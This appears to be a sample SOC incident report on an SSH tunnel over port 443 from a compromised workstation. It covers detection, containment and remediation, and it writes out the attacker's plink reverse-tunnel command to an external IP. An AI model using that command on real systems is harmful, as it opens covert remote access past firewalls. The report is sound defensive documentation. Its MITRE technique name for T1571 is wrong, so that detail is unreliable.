Darktrace Alert Details
Alert ID: DARKTRACE-NON-STANDARD-1571-7842 Alert Time: 2024-02-29 11:30:22 EST Severity: HIGH (85/100) Source: Darktrace Enterprise Immune System Rule: “Non-Standard Protocol over Common Port – Potential Tunneling” MITRE ATT&CK: T1571 – Non-Application Layer Protocol
Alert Details:
Detection: Non-HTTP traffic detected over port 443 (HTTPS port)
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 194.165.16[.]89:443 Time: 11:15-11:30 EST
Traffic Analysis:
Protocol: Not TLS/HTTPS (expected)
Protocol Detected: SSH (Secure Shell) over port 443
Packet Signatures:
SSH banner: “SSH-2.0-OpenSSH_8.9” detected
Key exchange initiated
Encrypted tunnel established
Duration: 15 minutes
Data transferred: 2.3 MB (inbound/outbound)
Detection Logic:
Port 443 is typically used for HTTPS (TLS)
SSH protocol detected on port 443 (anomalous)
Destination IP known for malicious activity
Pattern matches protocol tunneling/evasion
Additional Context:
ENG-WS-045 had previous suspicious activity
SSH tunneling often used for persistent access
Attacker bypassing firewall rules (port 443 allowed)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Darktrace alert
Darktrace Console
Confirmed SSH over port 443
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
plink.exe (PuTTY Link) running – SSH client
3. User Interview
Contact rpatel
Teams, Phone
User did NOT run SSH (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block destination IP
Palo Alto
IP 194.165.16[.]89 blocked
6. Malware Removal
Terminate plink.exe, clean host
CrowdStrike Live Response
SSH tunnel terminated; plink.exe deleted
Jira Incident Report
Ticket: SOC-2024-148 Summary: T1571 – SSH Tunneling over Port 443 for C2 Communication Status: RESOLVED Resolution: MALICIOUS – SSH Tunnel Terminated Priority: P2 – MEDIUM Labels: T1571, non-application-protocol, ssh-tunneling, darktrace, compromised-account Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Non-Standard Protocol over Common Port – Potential Tunneling”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 194.165.16[.]89:443.
Protocol: SSH (over port 443).
Time: 2024-02-29 11:30 EST.
Technique: MITRE ATT&CK T1571 – Non-Application Layer Protocol.
2. Technical Analysis:
Attack Chain:
10:30 – rpatel account compromised via phishing
10:45 – Attacker logs into ENG-WS-045 via RDP
10:50 – Attacker downloads plink.exe (SSH client)
11:00 – SSH tunnel established to 194.165.16[.]89:443
11:00-11:30 – Attacker uses tunnel for persistent access
11:30 – Darktrace detects
Tunneling Details:
Tool: plink.exe (PuTTY Link, legitimate SSH client)
Command: plink.exe -ssh -R 8080:localhost:80 attacker@194.165.16[.]89 -P 443 -i key.ppk
Purpose: Create reverse SSH tunnel for persistent access
Evasion: SSH over port 443 bypasses firewalls (port 443 allowed)
Attacker Activity via Tunnel:
Remote shell access
Downloaded additional tools (mimikatz)
Enumerated local files
No data exfiltration yet
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50 – plink.exe downloaded
11:00-11:30 – SSH tunnel active
11:30 – Darktrace alert
11:32 – SOC investigates
11:33 – Host isolated
11:34 – SSH tunnel terminated
Indicators of Compromise (IoCs):
Network:
– Destination: 194.165.16[.]89:443 (SSH)
– Protocol: SSH over port 443
Files:
– C:\Windows\Temp\plink.exe (SHA256: a1b2c3d4…)
– C:\Users\rpatel\key.ppk (SSH private key)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Terminated plink.exe process.
Deleted plink.exe and SSH key.
Blocked destination IP at firewall.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan (clean aside from attacker tools).
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to establish SSH tunnel.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Outbound SSH allowed over port 443 (should be inspected).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (tunnel used for access only).
7. Remediation & Prevention:
Completed Actions:
SSH tunnel terminated.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DPI (Deep Packet Inspection) on port 443.
Blocked SSH over non-standard ports.
8. Conclusion:
An attacker used a compromised engineering account to establish an SSH tunnel over port 443, evading firewall rules by using an allowed port. Darktrace detected the anomalous protocol usage and enabled rapid termination of the tunnel.
Closure Rationale: SSH tunnel terminated; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 12:30 EST